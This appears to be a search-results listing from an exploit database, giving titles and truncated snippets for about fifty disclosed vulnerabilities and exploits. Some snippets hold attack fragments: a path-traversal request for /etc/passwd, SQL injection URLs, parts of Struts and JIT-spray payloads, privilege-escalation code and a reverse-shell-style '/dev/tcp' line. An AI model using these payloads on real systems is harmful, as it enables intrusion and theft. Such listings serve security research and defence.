41207 matches found
PHP-Fusion 4.01 - readmore.php SQL Injection
PHP-Fusion 4.01 - readmore.php SQL Injection source: https://www.securityfocus.com/bid/30680/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Annuaire 1Two 1.01.1 - index.php Cross-Site Scripting
Annuaire 1Two 1.01.1 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/13961/info Annuaire 1Two is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issu...
DUclassmate 1.x - account.asp?MM-recordId Arbitrary Password Modification
DUclassmate 1.x - account.asp?MM-recordId Arbitrary Password Modification source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also...
Sync Breeze Enterprise 12.4.18 - Sync Breeze Enterprise Unquoted Service Path
Sync Breeze Enterprise 12.4.18 - Sync Breeze Enterprise Unquoted Service Path Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.syncbreeze.com Software Link:...
OpenBSD 6.x - Dynamic Loader Privilege Escalation
OpenBSD 6.x - Dynamic Loader Privilege Escalation Qualys Security Advisory Local Privilege Escalation in OpenBSD's dynamic loader CVE-2019-19726 Contents...
ICE HRM 23.0 - Multiple Vulnerabilities
ICE HRM 23.0 - Multiple Vulnerabilities Exploit Title: ICE HRM - ’ob’ SQL Inj. Dork: N/A Date: 14-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://icehrm.org Software Link:...
SoftDatepro Dating Social Network 1.3 - SQL Injection
SoftDatepro Dating Social Network 1.3 - SQL Injection Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection Dork: N/A Date: 30.10.2017 Vendor Homepage: http://www.softdatepro.com/ Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044...
Python smtplib 2.7.11 3.4.4 3.5.1 - Man In The Middle StartTLS Stripping
Python smtplib 2.7.11 3.4.4 3.5.1 - Man In The Middle StartTLS Stripping VuNote Author: Version: 0.2 Date: Nov 25th, 2015 Tag: python smtplib starttls stripping mitm Overview Name: python Vendor: python software foundation References: https://www.python.org/ 1 Version: 2.7.1...
Book Gallery - aboutbook.php SQL Injection
Book Gallery - aboutbook.php SQL Injection Title: Book Gallery aboutbook.php SQL Injection Vulnerability Version: 1.0 Author: Mr.P3rfekT Software Link:N/A Tested on Lunix CVE : N/A Founded By Mr.P3rfekT Helllo Allz Exploit : http://127.0.0.1/path/aboutbook.php?id= == SQLi sh done MaiL...
mxBB Module kb_mods 2.0.2 - Remote File Inclusion
A-Cart Pro 2.0 - product.asp?ProductID SQL Injection
A-Cart Pro 2.0 - product.asp?ProductID SQL Injection source: https://www.securityfocus.com/bid/21166/info A-Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass Config Upload Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass Config Upload Date: 2019-11-20 Exploit Author: Elber Tavares Vendor Homepage: https://www.intelbras.com/ Software Link:...
netkit-telnet-0.17 telnetd (Fedora 31) - BraveStarr Remote Code Execution
netkit-telnet-0.17 telnetd Fedora 31 - BraveStarr Remote Code Execution !/usr/bin/env python3 BraveStarr ========== Proof of Concept remote exploit against Fedora 31 netkit-telnet-0.17 telnetd. This is for demonstration purposes only. It has by no means been engineered to be reliable: 0xff bytes ...
microsoft.com
Pentest notes for: microsoft.com Exploit Pack Nmap 7.80 scan initiated Tue Dec 3 09:27:33 2019 as: /usr/bin/nmap -sV -A -oA log/exploitpack.com exploitpack.com Nmap scan report for exploitpack.com 132.148.22.104 Host is up 0.18s latency. rDNS record for 132.148.22.104:...
Ayukov NFTP client 1.71 - SYST Buffer Overflow
Ayukov NFTP client 1.71 - SYST Buffer Overflow Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow Date: 2019-11-03 Exploit Author: Chase Hatch SYANiDE Vendor Homepage: http://ayukov.com/nftp/ Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe Version: 1.71 Tested o...
Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)
Microsoft Windows 10 Build 17134 - Local Privilege Escalation UAC Bypass include "stdafx.h" include include "resource.h" void DropResourceconst wchart rsrcName, const wchart filePath HMODULE hMod = GetModuleHandleNULL; HRSRC res = FindResourcehMod, MAKEINTRESOURCEIDRDATA1, rsrcName; DWORD dllSize...
SquirrelMail 1.4.22 - Remote Code Execution
SquirrelMail 1.4.22 - Remote Code Execution !/bin/bash SquirrelMail = 1.4.23 Remote Code Execution PoC Exploit CVE-2017-7692 SquirrelMailRCEexploit.sh...
Joomla! Component Link Directory 1.0.3 - Remote File Inclusion
Joomla! Component Link Directory 1.0.3 - Remote File Inclusion .: insecurity research team :. .advisory. 18.o8.2oo6 Affected Application: Link Directory...
ASUS AXSP 1.02.00 - asComSvc Unquoted Service Path
ASUS AXSP 1.02.00 - asComSvc Unquoted Service Path Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Discovery by: Roberto Piña Discovery Date: 2020-03-10 Vendor Homepage: https://www.asus.com/ Software Link...
gSOAP 2.8 - Directory Traversal
gSOAP 2.8 - Directory Traversal Title: gSOAP 2.8 - Directory Traversal Author: Numan Türle Date: 2019-11-13 Vendor Homepage: https://www.genivia.com/ Version : gSOAP 2.8 Software Link : https://www.genivia.com/products.htmlgsoap POC GET /../../../../../../../../../etc/passwd HTTP/1.1...
BulletProof FTP Server 2019.0.0.50 - Storage-Path Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - Storage-Path Denial of Service PoC Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-05-18 Vendor Homepage: http://bpftpserver.com/ Software Link:...
Git Submodule - Arbitrary Code Execution (PoC)
Git Submodule - Arbitrary Code Execution PoC These releases fix a security flaw CVE-2018-17456, which allowed an attacker to execute arbitrary code by crafting a malicious .gitmodules file in a project cloned with --recurse-submodules. When running "git clone --recurse-submodules", Git parses the...
Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution function asmjsmodule "use asm"; / huge jitted nop sled / function payloadcode var val = 0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val +...
Apache Struts 2.3.x Showcase - Remote Code Execution
Apache Struts 2.3.x Showcase - Remote Code Execution !/usr/bin/python -- coding: utf-8 -- Just a demo for CVE-2017-9791 import requests def exploiturl, cmd: print"+ command: %s" % cmd payload = "%" payload += "[email protected]@DEFAULTMEMBERACCESS." payload += "memberAccess?memberAccess=dm:"...
Linux Kernel (Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation
Linux Kernel Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511 - ldsohwcap Stack Clash Local Privilege Escalation / Linuxldsohwcap.c for CVE-2017-1000366, CVE-2017-1000370 Copyright C 2017 Qualys, Inc. myimportanthwcaps adapted from elf/dl-hwcaps.c, part of the GNU C Library: Copyright C...
PHPDirector Game Edition - game.php SQL Injection
PHPDirector Game Edition - game.php SQL Injection PHPDirector Game Edition game.php Sql Injection Vulnerability Author : AtT4CKxT3rR0r1ST [email protected] Script :...
VMware Remote Console e.x.p build-158248 - Format String
VMware Remote Console e.x.p build-158248 - Format String DSECRG-09-053 VMware Remote Console - format string vulnerability http://www.dsecrg.com/pages/vul/show.php?id=153 VMrc vulnerable to format string attacks. Exploitation of this issue may lead to arbitrary code execution on the system where...
jetty 6.x 7.x - Cross-Site Scripting Information Disclosure Injection
jetty 6.x 7.x - Cross-Site Scripting Information Disclosure Injection Jetty 6.x and 7.x Multiple Vulnerabilities Name Multiple Vulnerabilities in Jetty Systems Affected Jetty 7.0.0 and earlier versions Severity Medium Impact CVSSv2 Medium 5/10, vector: AV:N/AC:L/Au:N/C:P/I:N/A:N Vendor...
ProductCart 1.x2.x - Custva.asp?redirectUrl Cross-Site Scripting
ProductCart 1.x2.x - Custva.asp?redirectUrl Cross-Site Scripting source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues...
rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution
rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp//...
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow Exploit Title: CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow Exploit Author: wetw0rk Exploit Version: Public POC Vendor Homepage:...
vBulletin 5.0 5.5.4 - updateAvatar Authenticated Remote Code Execution
vBulletin 5.0 5.5.4 - updateAvatar Authenticated Remote Code Execution ?php / vBulletin = 5.5.4 updateAvatar Remote Code Execution Vulnerability...
FaceSentry Access Control System 6.4.8 - Remote SSH Root
FaceSentry Access Control System 6.4.8 - Remote SSH Root !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2...
Python - socket.recvfrom_into() Remote Buffer Overflow
Python - socket.recvfrominto Remote Buffer Overflow !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-19...
Whatsapp 2.19.216 - Remote Code Execution
Whatsapp 2.19.216 - Remote Code Execution Exploit Title: Whatsapp 2.19.216 - Remote Code Execution Date: 2019-10-16 Exploit Author: Valerio Brussani @valbrux Vendor Homepage: https://www.whatsapp.com/ Version: include include include typedef uint8t byte; char gadgetp; void libc, lib; //dls...
AppXSvc - Privilege Escalation
AppXSvc - Privilege Escalation Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite EoP Date: Sep 4 2019 Exploit Author: Gabor Seljan Vendor Homepage: https://www.microsoft.com/ Version:...
Cisco Network Assistant 6.3.3 - Cisco Login Denial of Service (PoC)
Cisco Network Assistant 6.3.3 - Cisco Login Denial of Service PoC Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-27 Vendor Homepage: https://www.cisco.com/ Software Link :...
Android Bluetooth - Blueborne Information Leak (2)
Android Bluetooth - Blueborne Information Leak 2 from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate: pkt =...
OpenNetAdmin 13.03.01 - Remote Code Execution
OpenNetAdmin 13.03.01 - Remote Code Execution Exploit Title: OpenNetAdmin Remote Code Execution Date: 03/04/13 Exploit Author: Mandat0ry aka Matthew Bryant Vendor Homepage: http://opennetadmin.com/ Software Link: http://opennetadmin.com/download.html Version: 13.03.01 Tested on: Ubuntu CVE : No C...
Joomla! Component mod_spo - SQL Injection
Joomla! Component modspo - SQL Injection Exploit Title: Simple Page Option LFI Google Dork: inurl:modspo Date: 15/07/2011 Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/modspo1.5.16.zip Version: 1.5.x Tested on:...
Joomla! Component Artlinks 1.0b4 - Remote File Inclusion
Joomla! Component Artlinks 1.0b4 - Remote File Inclusion .: insecurity research team :. .advisory. 18.o8.2oo6 Affected Application: Artlinks v1.0 Beta 4...
Oracle Solaris 11.111.3 (RSH) - Stack Clash Local Privilege Escalation
Oracle Solaris 11.111.3 RSH - Stack Clash Local Privilege Escalation / Solarisrsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published ...
Freepbx 2.11.1.5 - Remote Code Execution
Freepbx 2.11.1.5 - Remote Code Execution Exploit Title: Freepbx coockie recordings injection Google Dork: Ask Santa Date: 23/12/2016 Exploit Author: inj3ctor3 Vendor Homepage: https://www.freepbx.org/ Software Link: ISO LINKS IN SITE https://www.freepbx.org/ Version: ALL && unpatched/...
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation 2 / Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings Date: 19/1/2016 Exploit Author: Perception Point Team CVE : CVE-2016-0728 / / CVE-2016-0728 local root exploit modified by...
IPComp - encapsulation Kernel Memory Corruption
IPComp - encapsulation Kernel Memory Corruption // source: http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload...
PozScripts Classified Auctions - gotourl.php?id SQL Injection
PozScripts Classified Auctions - gotourl.php?id SQL Injection Classified Auctions gotourl.php id Remote SQL Injection Vulnerability Hussin X Author: Hussin X Home : WwW.IQ-ty.CoM email: darkangelg85atYahooDoTcom script :...
3editor CMS 0.42 - index.php Local File Inclusion
3editor CMS 0.42 - index.php Local File Inclusion script Name: 3editor CMS index.php Local File Include Exploit Download:http://www.matteolucarelli.net/3editor/index.htm Author : Dr Max Virus Contact :[email protected] Bug & Problem In file index.php Let's Take a look; if !isset$GET'page'...
paBugs 2.0 Beta 3 - class.mysql.php Remote File Inclusion
Virtual Programming VP-ASP 45 - shopdisplayproducts.asp Cross-Site Scripting
Virtual Programming VP-ASP 45 - shopdisplayproducts.asp Cross-Site Scripting source: https://www.securityfocus.com/bid/9164/info A vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this...
Linux Kernel (Ubuntu 17.04) - XFRM Local Privilege Escalation
Linux Kernel Ubuntu 17.04 - XFRM Local Privilege Escalation Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM. Netlink is used to transfer...